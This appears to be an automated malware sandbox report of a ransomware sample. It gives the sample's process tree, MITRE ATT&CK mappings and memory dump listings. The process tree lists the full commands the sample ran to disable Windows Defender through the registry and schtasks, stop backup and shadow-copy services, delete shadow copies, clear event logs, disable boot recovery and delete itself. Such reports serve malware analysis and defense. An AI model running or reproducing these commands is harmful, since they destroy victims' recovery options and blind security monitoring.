PID 3824 wrote to memory of 1036	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	98
PID 3824 wrote to memory of 1036	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	98
PID 3824 wrote to memory of 1176	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	100
PID 3824 wrote to memory of 1176	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	100
PID 3824 wrote to memory of 1420	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	102
PID 3824 wrote to memory of 1420	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	102
PID 3824 wrote to memory of 1672	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	104
PID 3824 wrote to memory of 1672	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	104
PID 3824 wrote to memory of 1912	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	106
PID 3824 wrote to memory of 1912	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	106
PID 3824 wrote to memory of 2104	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	108
PID 3824 wrote to memory of 2104	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	108
PID 3824 wrote to memory of 2488	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	110
PID 3824 wrote to memory of 2488	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	110
PID 3824 wrote to memory of 2788	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	112
PID 3824 wrote to memory of 2788	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	112
PID 3824 wrote to memory of 3044	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	114
PID 3824 wrote to memory of 3044	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	114
PID 3824 wrote to memory of 3872	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	116
PID 3824 wrote to memory of 3872	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	116
PID 3824 wrote to memory of 4760	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	118
PID 3824 wrote to memory of 4760	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	118
PID 3824 wrote to memory of 4856	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	120
PID 3824 wrote to memory of 4856	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	120
PID 3824 wrote to memory of 4892	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	122
PID 3824 wrote to memory of 4892	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	122

C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
"C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe"
1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3824
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SamSs" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SamSs" /y
    3⤵
    PID:4244
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SDRSVC" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4084
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC" /y
    3⤵
    PID:4048
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SstpSvc" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3400
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SstpSvc" /y
    3⤵
    PID:4332
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "UI0Detect" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4288
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "UI0Detect" /y
    3⤵
    PID:4260
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "vmicvss" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4408
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "vmicvss" /y
    3⤵
    PID:4440
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "VSS" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4380
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "VSS" /y
    3⤵
    PID:3248
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "wbengine" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3256
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wbengine" /y
    3⤵
    PID:3916
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "WebClient" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4512
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WebClient" /y
    3⤵
    PID:2424
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "UnistoreSvc_12d0b" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:532
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "UnistoreSvc_12d0b" /y
    3⤵
    PID:816
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SamSs" start= disabled
  2⤵
  PID:924
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SDRSVC" start= disabled
  2⤵
  PID:1036
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SstpSvc" start= disabled
  2⤵
  PID:1176
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "UI0Detect" start= disabled
  2⤵
  PID:1420
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "vmicvss" start= disabled
  2⤵
  PID:1672
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "VSS" start= disabled
  2⤵
  PID:1912
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "wbengine" start= disabled
  2⤵
  PID:2104
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "WebClient" start= disabled
  2⤵
  PID:2488
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "UnistoreSvc_12d0b" start= disabled
  2⤵
  PID:2788
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:3044
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:3872
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:4760
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  PID:4856
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  PID:4892
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:4980
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:2280
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:4868
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:1576
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:4536
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:3160
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  PID:4944
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  PID:4236
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2⤵
  PID:5064
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:344
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:4840
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:1324
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:4784
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:1228
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:1040
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  PID:1280
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  2⤵
  PID:2300
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  2⤵
  PID:1772
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  2⤵
  PID:1844
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  - Modifies registry class
  PID:2120
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  - Modifies registry class
  PID:2456
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  - Modifies registry class
  PID:3144
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1020
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1560
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1632
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:3116
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies security service
  PID:3716
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:4172
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:5016
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl system
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3016
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl security
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4244
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl application
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4040
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4020
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe shadowcopy delete
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4352
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:3280
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled no
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:3320
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  2⤵
  PID:3920
- - C:\Program Files\Windows Defender\MpCmdRun.exe
    "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    3⤵
    - Deletes Windows Defender Definitions
    PID:424
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:4316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:824
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:3048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableRealtimeMonitoring $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3896
- C:\Windows\SYSTEM32\notepad.exe
  notepad.exe C:\rFSH_HOW_TO_DECRYPT.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2136
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe"
  2⤵
  PID:1816
- - C:\Windows\system32\PING.EXE
    ping.exe -n 5 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:2208

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Impair Defenses

T1562

Indicator Removal on Host

T1070

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/824-179-0x0000014609F80000-0x0000014609F82000-memory.dmp

Filesize
8KB

Download
memory/824-194-0x0000014623EB0000-0x0000014623EB2000-memory.dmp

Filesize
8KB

Download
memory/824-195-0x0000014623EB3000-0x0000014623EB5000-memory.dmp

Filesize
8KB

Download
memory/824-190-0x0000014609F80000-0x0000014609F82000-memory.dmp

Filesize
8KB

Download
memory/824-189-0x0000014626010000-0x0000014626086000-memory.dmp

Filesize
472KB

Download
memory/824-188-0x0000014609F80000-0x0000014609F82000-memory.dmp

Filesize
8KB

Download
memory/824-187-0x0000014609F80000-0x0000014609F82000-memory.dmp

Filesize
8KB

Download
memory/824-186-0x0000014609F80000-0x0000014609F82000-memory.dmp

Filesize
8KB

Download
memory/824-185-0x0000014609F80000-0x0000014609F82000-memory.dmp

Filesize
8KB

Download
memory/824-196-0x0000014623EB6000-0x0000014623EB8000-memory.dmp

Filesize
8KB

Download
memory/824-217-0x0000014609F80000-0x0000014609F82000-memory.dmp

Filesize
8KB

Download
memory/824-229-0x0000014623EB8000-0x0000014623EB9000-memory.dmp

Filesize
4KB

Download
memory/824-180-0x0000014609F80000-0x0000014609F82000-memory.dmp

Filesize
8KB

Download
memory/824-218-0x0000014609F80000-0x0000014609F82000-memory.dmp

Filesize
8KB

Download
memory/824-181-0x0000014609F80000-0x0000014609F82000-memory.dmp

Filesize
8KB

Download
memory/824-182-0x0000014609F80000-0x0000014609F82000-memory.dmp

Filesize
8KB

Download
memory/824-184-0x0000014623E80000-0x0000014623EA2000-memory.dmp

Filesize
136KB

Download
memory/824-183-0x0000014609F80000-0x0000014609F82000-memory.dmp

Filesize
8KB

Download
memory/3896-223-0x00000165AC570000-0x00000165AC572000-memory.dmp

Filesize
8KB

Download
memory/3896-259-0x00000165ADE26000-0x00000165ADE28000-memory.dmp

Filesize
8KB

Download
memory/3896-221-0x00000165AC570000-0x00000165AC572000-memory.dmp

Filesize
8KB

Download
memory/3896-220-0x00000165AC570000-0x00000165AC572000-memory.dmp

Filesize
8KB

Download
memory/3896-224-0x00000165AC570000-0x00000165AC572000-memory.dmp

Filesize
8KB

Download
memory/3896-225-0x00000165ADF20000-0x00000165ADF42000-memory.dmp

Filesize
136KB

Download
memory/3896-262-0x00000165ADE28000-0x00000165ADE29000-memory.dmp

Filesize
4KB

Download
memory/3896-228-0x00000165AC570000-0x00000165AC572000-memory.dmp

Filesize
8KB

Download
memory/3896-234-0x00000165AC570000-0x00000165AC572000-memory.dmp

Filesize
8KB

Download
memory/3896-233-0x00000165C8850000-0x00000165C88C6000-memory.dmp

Filesize
472KB

Download
memory/3896-232-0x00000165ADE23000-0x00000165ADE25000-memory.dmp

Filesize
8KB

Download
memory/3896-227-0x00000165AC570000-0x00000165AC572000-memory.dmp

Filesize
8KB

Download
memory/3896-230-0x00000165AC570000-0x00000165AC572000-memory.dmp

Filesize
8KB

Download
memory/3896-222-0x00000165AC570000-0x00000165AC572000-memory.dmp

Filesize
8KB

Download
memory/3896-231-0x00000165ADE20000-0x00000165ADE22000-memory.dmp

Filesize
8KB

Download